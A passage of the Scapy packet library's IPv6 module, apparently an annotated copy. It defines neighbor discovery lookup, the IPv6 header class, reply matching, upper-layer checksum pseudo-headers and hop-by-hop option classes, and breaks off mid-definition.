• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28    DLT_IPV6,
29    DLT_RAW,
30    DLT_RAW_ALT,
31    ETHER_ANY,
32    ETH_P_ALL,
33    ETH_P_IPV6,
34    MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38    BitEnumField,
39    BitField,
40    ByteEnumField,
41    ByteField,
42    DestIP6Field,
43    FieldLenField,
44    FlagsField,
45    IntField,
46    IP6Field,
47    LongField,
48    MACField,
49    MayEnd,
50    PacketLenField,
51    PacketListField,
52    ShortEnumField,
53    ShortField,
54    SourceIP6Field,
55    StrField,
56    StrFixedLenField,
57    StrLenField,
58    X3BytesField,
59    XBitField,
60    XByteField,
61    XIntField,
62    XShortField,
63)
64from scapy.layers.inet import (
65    _ICMPExtensionField,
66    _ICMPExtensionPadField,
67    _ICMP_extpad_post_dissection,
68    IP,
69    IPTools,
70    TCP,
71    TCPerror,
72    TracerouteResult,
73    UDP,
74    UDPerror,
75)
76from scapy.layers.l2 import (
77    CookedLinux,
78    Ether,
79    GRE,
80    Loopback,
81    SNAP,
82    SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90    in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91    in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
93
94# Typing
95from typing import (
96    Optional,
97)
98
# This module cannot work when the Python runtime has no IPv6 support.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")

# Guarantee that the protocol constants exist, keeping whatever value the
# platform already exposes and falling back to the well-known number.
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = getattr(socket, "IPPROTO_IPV6", 41)
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = getattr(socket, "IPPROTO_IPIP", 4)

if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401
111
##########################
#  Neighbor cache stuff  #
##########################

# Register the "in6_neighbor" cache; getmacbyip6() reads from it and stores
# the link-layer addresses it resolves into it.
# NOTE(review): 120 is presumably the entry lifetime in seconds - confirm
# against conf.netcache.new_cache().
conf.netcache.new_cache("in6_neighbor", 120)
117
118
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation and wait for its answer.

    The solicitation asks for the MAC address of the neighbor that owns the
    IPv6 address 'addr'.

    :param addr: IPv6 address of the neighbor to resolve
    :param src: IPv6 address used as the source of the message
    :param iface: interface the message is sent on; the source MAC address
        is the hardware address of that interface
    :param timeout: how long to wait for an answer (1 second by default)
    :param chainCC: passed unchanged to the sending function (srp1)
    :return: the answer (ethernet frame), or None when nothing was received
    """
    # Destination addresses (IPv6 and Ethernet) are both derived from the
    # value computed by in6_getnsma() for the target address.
    ns_mcast = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, ns_mcast)
    mac_dst = in6_getnsmac(ns_mcast)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)
146
147
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Return the MAC address of the next hop used to reach an IPv6 address.

    Lookup order:

    - a multicast destination is mapped directly to a MAC address;
    - a route through the loopback interface yields "ff:ff:ff:ff:ff:ff";
    - otherwise the "in6_neighbor" cache is consulted and, on a miss, a
      Neighbor Solicitation is sent with :func:`neighsol`. A successful
      resolution is stored in the cache.

    :param ip6: destination IPv6 address (a Net6 instance is converted
        with str())
    :param chainCC: passed to the sending function used to perform the
        resolution, if one is needed
    :return: the MAC address, or None when resolution failed

    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
    """
    # Sanitize the IP
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast destinations need no resolution
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    out_iface, src_addr, next_hop = conf.route6.route(ip6)

    if out_iface == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the gateway instead of the destination when there is one
    target = ip6 if next_hop == '::' else next_hop

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    reply = neighsol(target, src_addr, out_iface, chainCC=chainCC)
    if reply is None:
        return None

    # Prefer the link-layer address option, fall back to the frame source
    if ICMPv6NDOptDstLLAddr in reply:
        resolved = reply[ICMPv6NDOptDstLLAddr].lladdr
    else:
        resolved = reply.src
    conf.netcache.in6_neighbor[target] = resolved
    return resolved
194
195
196#############################################################################
197#############################################################################
198#                                IPv6 Class                                 #
199#############################################################################
200#############################################################################
201
# Human readable names of the IPv6 Next Header values
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}

# Name of the class used to dissect the payload for a Next Header value
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}
230
231
class IP6ListField(StrField):
    # Field holding a list of IPv6 addresses, each one taking 16 bytes on
    # the wire. The list is bounded either by a byte length (length_from)
    # or by a number of addresses (count_from).
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        """
        :param name: field name
        :param default: default list of addresses (None means empty list)
        :param count_from: callable returning the number of addresses
        :param length_from: callable returning the length in bytes; takes
            precedence over count_from when dissecting
        """
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        """Size in bytes of the address list."""
        return 16 * len(i)

    def i2count(self, pkt, i):
        """Number of addresses; 0 when the value is not a list."""
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Dissect addresses from 's'; return (remaining bytes, list)."""
        max_addrs = byte_len = None
        if self.length_from is not None:
            byte_len = self.length_from(pkt)
        elif self.count_from is not None:
            max_addrs = self.count_from(pkt)

        # Only the first byte_len bytes belong to the field when a length
        # is known; what follows is handed back untouched.
        if byte_len is None:
            pending, trailer = s, b""
        else:
            pending, trailer = s[:byte_len], s[byte_len:]

        addresses = []
        while pending:
            if max_addrs is not None:
                if max_addrs <= 0:
                    break
                max_addrs -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        """Concatenate the binary form of every address in 'x'."""
        packed = []
        for item in x:
            try:
                chunk = inet_pton(socket.AF_INET6, item)
            except Exception:
                # Not a literal address: resolve it first
                resolved = socket.getaddrinfo(item, None, socket.AF_INET6)[0][-1][0]  # noqa: E501
                chunk = inet_pton(socket.AF_INET6, resolved)
            packed.append(chunk)
        return b"".join(packed)

    def i2repr(self, pkt, x):
        """Render the list as '[ a, b, ... ]' ('[]' for None)."""
        if x is None:
            return "[]"
        return "[ %s ]" % ", ".join('%s' % item for item in x)
291
292
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """
        Pick the class used to dissect the payload bytes 'p', based on the
        'nh' (Next Header) value of this layer.

        Every index into 'p' is guarded by a length check, so a truncated
        payload falls back to a generic class instead of raising
        IndexError.

        :param p: raw bytes of the payload
        :return: the class selected for the payload (Raw as a last resort)
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # Nothing to read the ICMPv6 type from
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header: byte 2 is checked against 4; this
            # is only read when the payload is long enough to hold it
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)
312
313
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src"),
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        scope = None
        if isinstance(dst, (Net6, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, (Gen, list)):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst, dev=scope)

    def mysummary(self):
        """One-line summary: 'src > dst (nh)'."""
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill 'plen' when it was left to None."""
        p += pay
        if self.plen is None:
            # The 40 bytes of the fixed IPv6 header are not counted
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """Extract the IPv6 payload

        :param data: bytes following the fixed IPv6 header
        :return: tuple (payload bytes, padding bytes)
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm take advantage of the Jumbo option
            #        mandatory alignment (4n + 2, RFC2675 Section 2)
            # Only the Hop-by-Hop header itself is scanned, and only at
            # offsets where the whole 6-byte option (type, length, 32-bit
            # value) is available, so no read goes past the buffer.
            jumbo_len = None
            scan_end = min(hbh_len, len(data))
            for offset in range(2, scan_end - 5, 4):
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # The length is carried in network byte order
                    jumbo_len = struct.unpack("!I", data[offset + 2:offset + 6])[0]  # noqa: E501
                    break

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 defines the Jumbo Payload Length as
            # already including the Hop-by-Hop header; the historical sum
            # is kept here - confirm whether hbh_len must be dropped.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """Return the bytes used to pair a request with its answer."""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: hash on the packet quoted in the error
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            # NOTE(review): IPv6 declares no 'addresses' field itself;
            # presumably the lookup is resolved from the routing header
            # payload - confirm.
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            # The last Home Address Option found, if any, gives the source
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                ss = foundhao.hoa
            nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether this packet (reply) answers 'other' (request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
491
492
class IPv46(IP, IPv6):
    """
    Dispatcher class: it selects between IP and IPv6 according to the IP
    version, which is needed while parsing Raw IP pcap files.
    """
    name = "IPv4/6"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return IPv6 for version 6 data or arguments, IP otherwise."""
        if _pkt:
            # The version is stored in the upper 4 bits of the first byte
            return IPv6 if orb(_pkt[0]) >> 4 == 6 else IP
        if kargs.get("version") == 6:
            return IPv6
        return IP
508
509
def inet6_register_l3(l2, l3):
    """
    Resolve the default L2 destination address when IPv6 is used.

    :param l2: layer 2 packet (not used by the resolution)
    :param l3: IPv6 packet whose 'dst' is resolved
    :return: the value returned by getmacbyip6() for that destination
    """
    destination = l3.dst
    return getmacbyip6(destination)


# Use the resolver above whenever an IPv6 packet is carried over Ether
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
518
519
class IPerror6(IPv6):
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """
        Tell whether this packet, quoted inside an ICMPv6 error message,
        corresponds to the packet 'other' that was sent.

        The upper layers of both packets are compared over the length of
        the shortest one. When both are TCP with different options (MSS
        clamping), the options, checksum and data offset of both layers
        are nulled for the comparison only: the original values are always
        put back, even if building the packets raises.

        :param other: the packet initially sent
        :return: True when the citation matches 'other', False otherwise
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        # Sources must match. Destinations must match too, unless the
        # request has a RH : don't check dst address in that case
        if not (ss == os and (sd == od or request_has_rh)):
            return False

        # Let's deal with possible MSS Clamping
        if (isinstance(selfup, TCP) and
                isinstance(otherup, TCP) and
                selfup.options != otherup.options):  # seems clamped
            layers = (otherup, selfup)
            # Save fields modified by MSS clamping
            saved = [(lyr.options, lyr.chksum, lyr.dataofs)
                     for lyr in layers]
            try:
                # Nullify them
                for lyr in layers:
                    lyr.options = []
                    lyr.chksum = 0
                    lyr.dataofs = 0
                s1 = raw(selfup)
                s2 = raw(otherup)
            finally:
                # recall saved values, whatever happened above, so that
                # the caller's packets are never left modified
                for lyr, (opts, cksum, dataofs) in zip(layers, saved):
                    lyr.options = opts
                    lyr.chksum = cksum
                    lyr.dataofs = dataofs
        else:
            s1 = raw(selfup)
            s2 = raw(otherup)

        # The citation may be truncated: compare the common prefix only
        tmp_len = min(len(s1), len(s2))
        return s1[:tmp_len] == s2[:tmp_len]

    def mysummary(self):
        """Use the generic Packet summary instead of the IPv6 one."""
        return Packet.mysummary(self)
597
598
599#############################################################################
600#############################################################################
601#                 Upper Layer Checksum computation                          #
602#############################################################################
603#############################################################################
604
class PseudoIPv6(Packet):  # IPv6 Pseudo-header for checksum computation
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),    # upper layer packet length
        BitField("zero", 0, 24),
        ByteField("nh", 0),         # upper layer protocol number
    ]
612
613
def in6_pseudoheader(nh, u, plen):
    # type: (int, IP, int) -> PseudoIPv6
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    The underlayers of 'u' are walked down to the IPv6 header in order to
    fill the pseudo header with:

    - the Next Header value 'nh';
    - the address of the _final_ destination: when a Routing Header with a
      non-zero segleft and a non-empty address list is met, its last
      address is used (the first address for a Segment Routing Header).
      Only the first such header met is taken into account. Otherwise the
      destination of the IPv6 header is used;
    - the address of the _real_ source: the home address of the HAO option
      when a Destination Option header holding exactly that one option is
      met, the source of the IPv6 header otherwise;
    - the upper layer length 'plen'.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the pseudo header, or None (after a warning) when no IPv6
        underlayer exists
    """
    pseudo = PseudoIPv6()
    pseudo.nh = nh

    final_dst = 0
    home_addr = 0
    dst_locked = False
    layer = u
    while layer is not None and not isinstance(layer, IPv6):
        if (isinstance(layer, IPv6ExtHdrRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0 and
                not dst_locked):
            final_dst = layer.addresses[-1]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrSegmentRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0 and
                not dst_locked):
            final_dst = layer.addresses[0]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrDestOpt) and
                (len(layer.options) == 1) and
                isinstance(layer.options[0], HAO)):
            home_addr = layer.options[0].hoa
        layer = layer.underlayer

    if layer is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None

    # 'layer' is now the IPv6 header: use its addresses as fallback
    pseudo.src = home_addr if home_addr else layer.src
    pseudo.dst = final_dst if final_dst else layer.dst
    pseudo.uplen = plen
    return pseudo
669
670
def in6_chksum(nh, u, p):
    """
    Compute an upper layer checksum, as specified in
    RFC 2460 - 8.1 Upper-Layer Checksums

    See also `.in6_pseudoheader`

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum of the pseudo header followed by 'p', or 0 when
        no pseudo header could be built
    """
    pseudo = in6_pseudoheader(nh, u, len(p))
    return 0 if pseudo is None else checksum(raw(pseudo) + p)
688
689
690#############################################################################
691#############################################################################
692#                           Extension Headers                               #
693#############################################################################
694#############################################################################
695
696
697# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    # Common base of the extension headers: the payload class is guessed
    # from 'nh' through _IPv6GuessPayload.default_payload_class().
    name = 'Abstract IPv6 Option Header'
    # NOTE(review): presumably lets extension headers reuse the payload
    # bindings declared for IPv6 and IPerror6 - confirm.
    aliastypes = [IPv6, IPerror6]  # TODO ...
701
702
703#                    IPv6 options for Extension Headers                     #
704
# Names of the option types, used to display the 'otype' field of the
# options. 0x63 (RPL Option, RFC 6553) is listed so that RplOption, which
# is registered for dissection under that value, is displayed by name
# instead of as a bare number.
_hbhopts = {0x00: "Pad1",
            0x01: "PadN",
            0x04: "Tunnel Encapsulation Limit",
            0x05: "Router Alert",
            0x06: "Quick-Start",
            0x63: "RPL Option",
            0xc2: "Jumbo Payload",
            0xc9: "Home Address Option"}
712
713
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField whose representation also decodes the bits of
    the IPv6 option type: what nodes that do not understand the option
    must do with it (two highest-order bits) and whether the option data
    may change en-route (third highest-order bit).

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    pol = {0x00: "00: skip",
           0x40: "01: discard",
           0x80: "10: discard+ICMP",
           0xC0: "11: discard+ICMP not mcast"}

    enroutechange = {0x00: "0: Don't change en-route",
                     0x20: "1: May change en-route"}

    def i2repr(self, pkt, x):
        """Return 'name [action, en-route change]' for option type x."""
        label = self.i2s.get(x, repr(x))
        action = self.pol[x & 0xC0]
        mutability = self.enroutechange[x & 0x20]
        return "{} [{}, {}]".format(label, action, mutability)
735
736
class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # By default, no alignment requirement
        """
        Return the padding length required before this option.

        As specified in section 4.2 of RFC 2460, every option has an
        alignment requirement usually expressed xn+y, meaning the Option
        Type must appear at an integer multiple of x octets from the
        start of the header, plus y octets.

        :param curpos: current position from the start of the header
        :return: required padding length (always 0 for this class)
        """
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        """Select the option class registered for the first byte."""
        if not _pkt:
            return cls
        # The first byte is the option type
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
766
767
class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    # Padding option made of the option type byte only
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):  # No alignment requirement
        """Padding needed before the option at 'curpos': always 0."""
        return 0

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
777
778
class PadN(Packet):  # IPv6 Hop-By-Hop Option
    # Padding option: type, length, then 'optlen' bytes of data
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # No alignment requirement
        """Padding needed before the option at 'curpos': always 0."""
        return 0

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
791
792
class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField("value", None,
                       {0: "Datagram contains a MLD message",
                        1: "Datagram contains RSVP message",
                        2: "Datagram contains an Active Network message",
                        68: "NSIS NATFW NSLP",
                        69: "MPLS OAM",
                        65535: "Reserved"}),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
        """Bytes of padding needed so the option starts at 2n+0."""
        modulus, remainder = 2, 0
        # Distance from curpos up to the next position equal to
        # 'remainder' modulo 'modulus'
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
817
818
class RplOption(Packet):    # RFC 6553 - RPL Option
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        # One byte of flags: three 1-bit flags then 5 unused bits
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
        """Bytes of padding needed so the option starts at 2n+0."""
        modulus, remainder = 2, 0
        # Distance from curpos up to the next position equal to
        # 'remainder' modulo 'modulus'
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
838
839
class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 4n+2
        """Bytes of padding needed so the option starts at 4n+2."""
        modulus, remainder = 4, 2
        # Distance from curpos up to the next position equal to
        # 'remainder' modulo 'modulus'
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        """Leave every remaining byte to the following option."""
        return b"", p
854
855
class HAO(Packet):  # IPv6 Destination Options Header Option
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        """Return how many pad bytes are needed before this option.

        Alignment requirement: 8n+6. The result is 0 when ``curpos`` is
        already aligned.
        """
        modulus, remainder = 8, 6
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        """Return an empty payload and hand every remaining byte back."""
        payload, remaining = b"", p
        return payload, remaining
870
871
# Maps each known option type value to the class implementing that option
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}
878
879
880#                         Hop-by-Hop Extension Header                       #
881
class _OptionsField(PacketListField):
    # 'curpos' is the offset at which the options start inside the header
    # that owns this field; alignment is computed relative to it.
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
